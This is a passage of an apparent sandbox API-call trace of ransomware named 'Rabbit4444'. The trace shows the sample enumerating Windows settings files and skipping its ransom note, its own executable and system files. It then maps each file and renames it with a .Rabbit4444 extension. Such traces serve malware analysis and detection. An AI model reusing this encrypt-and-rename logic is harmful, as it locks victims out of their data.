"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemdetails.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2d0daa7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf2d0daa7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", cAlternateFileName="AA90D6~1.SET")) returned 1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2=".") returned 1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="..") returned 1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="windows") returned -1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="boot") returned -1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.393] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.393] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms") returned="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms" [0056.393] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.394] lstrlenW (lpString="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms") returned 59 [0056.394] lstrlenW (lpString="Rabbit4444") returned 10 [0056.394] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.394] lstrlenW (lpString=".dll") returned 4 [0056.394] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.394] lstrlenW (lpString=".lnk") returned 4 [0056.394] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.394] lstrlenW (lpString=".ini") returned 4 [0056.394] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.394] lstrlenW (lpString=".sys") returned 4 [0056.394] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.394] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemdeviceencryption.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.394] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.394] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14770504681) returned 1 [0056.394] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1183) returned 1 [0056.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0056.394] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0056.396] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0056.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.397] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.397] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.397] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.397] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14770751660) returned 1 [0056.397] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.397] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0056.397] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.397] CloseHandle (hObject=0x298) returned 1 [0056.397] CloseHandle (hObject=0x278) returned 1 [0056.397] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms.Rabbit4444") returned 187 [0056.397] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemdeviceencryption.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemdeviceencryption.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.398] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf30c7491, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf30c7491, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", cAlternateFileName="AA8AD4~1.SET")) returned 1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2=".") returned 1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="..") returned 1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="windows") returned -1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="boot") returned -1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.398] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.398] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms") returned="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms" [0056.398] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.399] lstrlenW (lpString="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms") returned 54 [0056.399] lstrlenW (lpString="Rabbit4444") returned 10 [0056.399] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.399] lstrlenW (lpString=".dll") returned 4 [0056.399] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.399] lstrlenW (lpString=".lnk") returned 4 [0056.399] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.399] lstrlenW (lpString=".ini") returned 4 [0056.399] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.399] lstrlenW (lpString=".sys") returned 4 [0056.399] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.399] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemsupportinfo.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.399] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.399] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14771013219) returned 1 [0056.399] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1158) returned 1 [0056.399] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0056.400] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.401] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.402] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14771260643) returned 1 [0056.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0056.402] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.402] CloseHandle (hObject=0x298) returned 1 [0056.402] CloseHandle (hObject=0x278) returned 1 [0056.402] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms.Rabbit4444") returned 182 [0056.402] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemsupportinfo.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemsupportinfo.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.403] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3303771, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf3303771, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", cAlternateFileName="AAEE78~1.SET")) returned 1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2=".") returned 1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="..") returned 1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="windows") returned -1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="boot") returned -1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.403] lstrcmpiW (lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.403] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms") returned="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms" [0056.404] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.404] lstrlenW (lpString="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms") returned 54 [0056.404] lstrlenW (lpString="Rabbit4444") returned 10 [0056.404] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.404] lstrlenW (lpString=".dll") returned 4 [0056.404] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.404] lstrlenW (lpString=".lnk") returned 4 [0056.404] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.404] lstrlenW (lpString=".ini") returned 4 [0056.404] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.404] lstrlenW (lpString=".sys") returned 4 [0056.404] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.404] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemwindowsinfo.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.404] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.404] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14771506196) returned 1 [0056.404] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1154) returned 1 [0056.404] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.404] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0056.404] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.408] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.409] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14771969188) returned 1 [0056.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0056.409] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.409] CloseHandle (hObject=0x298) returned 1 [0056.409] CloseHandle (hObject=0x278) returned 1 [0056.409] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms.Rabbit4444") returned 182 [0056.409] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemwindowsinfo.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppcsystemwindowsinfo.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf37c82ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf37c82ef, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x434, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPen.settingcontent-ms", cAlternateFileName="AAD39C~1.SET")) returned 1 [0056.410] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.410] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.410] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.410] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2=".") returned 1 [0056.410] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="..") returned 1 [0056.410] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="windows") returned -1 [0056.411] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.411] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.411] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="boot") returned -1 [0056.411] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.411] lstrcmpiW (lpString1="AAA_SettingsGroupPen.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.411] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPen.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPen.settingcontent-ms") returned="AAA_SettingsGroupPen.settingcontent-ms" [0056.411] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPen.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.411] lstrlenW (lpString="AAA_SettingsGroupPen.settingcontent-ms") returned 38 [0056.411] lstrlenW (lpString="Rabbit4444") returned 10 [0056.411] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.411] lstrlenW (lpString=".dll") returned 4 [0056.411] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.411] lstrlenW (lpString=".lnk") returned 4 [0056.411] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.411] lstrlenW (lpString=".ini") returned 4 [0056.411] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.411] lstrlenW (lpString=".sys") returned 4 [0056.411] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.411] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPen.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppen.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.411] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.411] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14772223183) returned 1 [0056.412] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1076) returned 1 [0056.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.412] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.413] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 